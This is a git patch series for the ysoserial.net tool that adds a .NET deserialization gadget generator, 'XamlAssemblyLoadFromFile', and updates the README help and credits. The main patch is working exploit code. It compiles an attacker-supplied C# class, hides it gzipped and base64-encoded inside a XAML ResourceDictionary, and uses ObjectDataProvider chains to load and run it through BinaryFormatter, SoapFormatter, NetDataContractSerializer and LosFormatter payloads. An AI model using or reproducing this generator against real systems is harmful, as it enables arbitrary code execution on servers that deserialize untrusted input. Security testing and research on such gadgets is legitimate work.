From 69183213182ddb23d444bae633a7b56d97bc4813 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov <prokhorov.anton.s@gmail.com>
Date: Thu, 1 Jun 2023 23:41:15 +0100
Subject: [PATCH 1/4] Added new generator XamlAssemblyLoadFromFileGenerator

---
 .../XamlAssemblyLoadFromFileGenerator.cs      | 156 ++++++++++++++++++
 ysoserial/ysoserial.csproj                    |   3 +-
 2 files changed, 158 insertions(+), 1 deletion(-)
 create mode 100644 ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs

diff --git a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
new file mode 100644
index 0000000..43b8146
--- /dev/null
+++ b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
@@ -0,0 +1,156 @@
+using NDesk.Options;
+using System;
+using System.Collections.Generic;
+using System.IO.Compression;
+using System.IO;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+   public class XamlAssemblyLoadFromFileGenerator : GenericGenerator
+   {
+      public override string Name()
+      {
+         return "XamlAssemblyLoadFromFileGenerator";
+      }
+
+      public override string AdditionalInfo()
+      {
+         return "Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'";
+      }
+
+      public override string Finders()
+      {
+         return "Soroush Dalili";
+      }
+
+      public override string Contributors()
+      {
+         return "russtone";
+      }
+
+      public override List<string> Labels()
+      {
+         return new List<string> { GadgetTypes.NotBridgeButDervied };
+      }
+
+      public override List<string> SupportedFormatters()
+      {
+         return new List<string> { "BinaryFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
+      }
+
+      int variant_number = 1;
+
+      public override OptionSet Options()
+      {
+         OptionSet options = new OptionSet()
+         {
+            {"var|variant=", "Choices: 1 -> use TypeConfuseDelegateGenerator [default], 2 -> use TextFormattingRunPropertiesMarshal", v => int.TryParse(v, out variant_number) },
+         };
+
+         return options;
+      }
+
+      public override object Generate(string formatter, InputArgs inputArgs)
+      {
+         var files = inputArgs.Cmd;
+         byte[] asmData = LocalCodeCompiler.CompileToAsmBytes(files);
+         byte[] gzipAsmData = Gzip(asmData);
+         string base64GzipAsmData = Convert.ToBase64String(gzipAsmData);
+         
+
+         var xmlResourceDict = @"<ResourceDictionary
+xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
+xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
+xmlns:s=""clr-namespace:System;assembly=mscorlib""
+xmlns:r=""clr-namespace:System.Reflection;assembly=mscorlib""
+xmlns:i=""clr-namespace:System.IO;assembly=mscorlib""
+xmlns:c=""clr-namespace:System.IO.Compression;assembly=System""
+>
+   <s:Array x:Key=""data"" x:FactoryMethod=""s:Convert.FromBase64String"">
+      <x:Arguments>
+         <s:String>" + base64GzipAsmData + @"</s:String>
+      </x:Arguments>
+   </s:Array>
+   <i:MemoryStream x:Key=""inputStream"">
+      <x:Arguments>
+         <StaticResource ResourceKey=""data""></StaticResource>
+      </x:Arguments>
+   </i:MemoryStream>
+   <c:GZipStream x:Key=""gzipStream"">
+      <x:Arguments>
+            <StaticResource ResourceKey=""inputStream""></StaticResource>
+            <c:CompressionMode>0</c:CompressionMode>
+      </x:Arguments>
+   </c:GZipStream>
+   <s:Array x:Key=""buf"" x:FactoryMethod=""s:Array.CreateInstance"">
+      <x:Arguments>
+         <x:Type TypeName=""s:Byte""/>
+         <x:Int32>" + asmData.Length + @"</x:Int32>
+      </x:Arguments>
+   </s:Array>
+   <ObjectDataProvider x:Key=""tmp"" ObjectInstance=""{StaticResource gzipStream}"" MethodName=""Read"">
+      <ObjectDataProvider.MethodParameters>
+         <StaticResource ResourceKey=""buf""></StaticResource>
+         <x:Int32>0</x:Int32>
+         <x:Int32>" + asmData.Length + @"</x:Int32>
+      </ObjectDataProvider.MethodParameters>
+   </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""asmLoad"" ObjectType=""{x:Type r:Assembly}"" MethodName=""Load"">
+        <ObjectDataProvider.MethodParameters>
+            <StaticResource ResourceKey=""buf""></StaticResource>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""types"" ObjectInstance=""{StaticResource asmLoad}"" MethodName=""GetTypes"">
+        <ObjectDataProvider.MethodParameters/>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""firstType"" ObjectInstance=""{StaticResource types}"" MethodName=""GetValue"">
+        <ObjectDataProvider.MethodParameters>
+            <s:Int32>0</s:Int32>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+    <ObjectDataProvider x:Key=""createInstance"" ObjectInstance=""{StaticResource firstType}"" MethodName=""InvokeMember"">
+        <ObjectDataProvider.MethodParameters>
+            <x:Null/>
+            <r:BindingFlags>512</r:BindingFlags>
+            <x:Null/>
+            <x:Null/>
+            <x:Null/>
+            <x:Null/>
+            <x:Null/>
+            <x:Null/>
+        </ObjectDataProvider.MethodParameters>
+    </ObjectDataProvider>
+</ResourceDictionary>";
+
+         if (inputArgs.Minify)
+         {
+            xmlResourceDict = XmlHelper.Minify(xmlResourceDict, null, null);
+         }
+
+         object obj;
+
+         if (variant_number == 1)
+         {
+            obj = TypeConfuseDelegateGenerator.GetXamlGadget(xmlResourceDict);
+         }
+         else
+         {
+            obj = new TextFormattingRunPropertiesMarshal(xmlResourceDict);
+         }
+
+         return Serialize(obj, formatter, inputArgs);
+      }
+
+      private static byte[] Gzip(byte[] data)
+      {
+         var outputStream = new MemoryStream();
+         var gzipStream = new GZipStream(outputStream, CompressionMode.Compress);
+         gzipStream.Write(data, 0, data.Length);
+         gzipStream.Close();
+         var res = outputStream.ToArray();
+         outputStream.Close();
+         return res;
+      }
+   }
+}
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index bf77a64..fc3fc28 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -193,6 +193,7 @@
     <Compile Include="Generators\ClaimsPrincipalGenerator.cs" />
     <Compile Include="Generators\DataSetGenerator.cs" />
     <Compile Include="Generators\DataSetTypeSpoofGenerator.cs" />
+    <Compile Include="Generators\XamlAssemblyLoadFromFileGenerator.cs" />
     <Compile Include="Generators\ObjRefGenerator.cs" />
     <Compile Include="Generators\ResourceSetGenerator.cs" />
     <Compile Include="Generators\SessionSecurityTokenGenerator.cs" />
@@ -291,4 +292,4 @@
   <Target Name="AfterBuild">
   </Target>
   -->
-</Project>
\ No newline at end of file
+</Project>

From 28b8417c839c9b327de03dae2ec50dcac52c4f93 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov <prokhorov.anton.s@gmail.com>
Date: Fri, 2 Jun 2023 10:28:02 +0100
Subject: [PATCH 2/4] Update README.md

---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/README.md b/README.md
index 43aa37e..e863a21 100644
--- a/README.md
+++ b/README.md
@@ -184,6 +184,13 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 	(*) WindowsPrincipal
 		Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
 			Labels: Bridge and derived
+	(*) XamlAssemblyLoadFromFileGenerator [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
+		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
+			Labels: Not bridge but derived
+			Extra options:
+			      --var, --variant=VALUE Choices: 1 -> use TypeConfuseDelegateGenerator 
+			                               [default], 2 -> use 
+			                               TextFormattingRunPropertiesMarshal
 
 == PLUGINS ==
 	(*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)

From 9b642d93adcc7bdaada19df70b051271f8b7fa55 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov <prokhorov.anton.s@gmail.com>
Date: Fri, 2 Jun 2023 10:32:26 +0100
Subject: [PATCH 3/4] Update README.md

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index e863a21..d470c7a 100644
--- a/README.md
+++ b/README.md
@@ -565,6 +565,8 @@ Credits for available gadgets:
 		[Finders: Levi Broderick] [Contributors: Alvaro Munoz, Soroush Dalili]
 	WindowsPrincipal
 		[Finders: Steven Seeley of Qihoo 360 Vulcan Team] [Contributors: Chris Anastasio]
+	XamlAssemblyLoadFromFileGenerator
+		[Finders: Soroush Dalili] [Contributors: russtone]
 
 Credits for available plugins:
 	ActivatorUrl

From 399a4361a744912b05b2c4b490b39d793efbb5e1 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov <prokhorov.anton.s@gmail.com>
Date: Fri, 2 Jun 2023 10:34:38 +0100
Subject: [PATCH 4/4] Rename: XamlAssemblyLoadFromFileGenerator ->
 XamlAssemblyLoadFromFile

---
 README.md                                                 | 4 ++--
 ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index d470c7a..3b5f05c 100644
--- a/README.md
+++ b/README.md
@@ -184,7 +184,7 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 	(*) WindowsPrincipal
 		Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
 			Labels: Bridge and derived
-	(*) XamlAssemblyLoadFromFileGenerator [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
+	(*) XamlAssemblyLoadFromFile [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
 		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
 			Labels: Not bridge but derived
 			Extra options:
@@ -565,7 +565,7 @@ Credits for available gadgets:
 		[Finders: Levi Broderick] [Contributors: Alvaro Munoz, Soroush Dalili]
 	WindowsPrincipal
 		[Finders: Steven Seeley of Qihoo 360 Vulcan Team] [Contributors: Chris Anastasio]
-	XamlAssemblyLoadFromFileGenerator
+	XamlAssemblyLoadFromFile
 		[Finders: Soroush Dalili] [Contributors: russtone]
 
 Credits for available plugins:
diff --git a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
index 43b8146..47ca25f 100644
--- a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
+++ b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
@@ -11,7 +11,7 @@ public class XamlAssemblyLoadFromFileGenerator : GenericGenerator
    {
       public override string Name()
       {
-         return "XamlAssemblyLoadFromFileGenerator";
+         return "XamlAssemblyLoadFromFile";
       }
 
       public override string AdditionalInfo()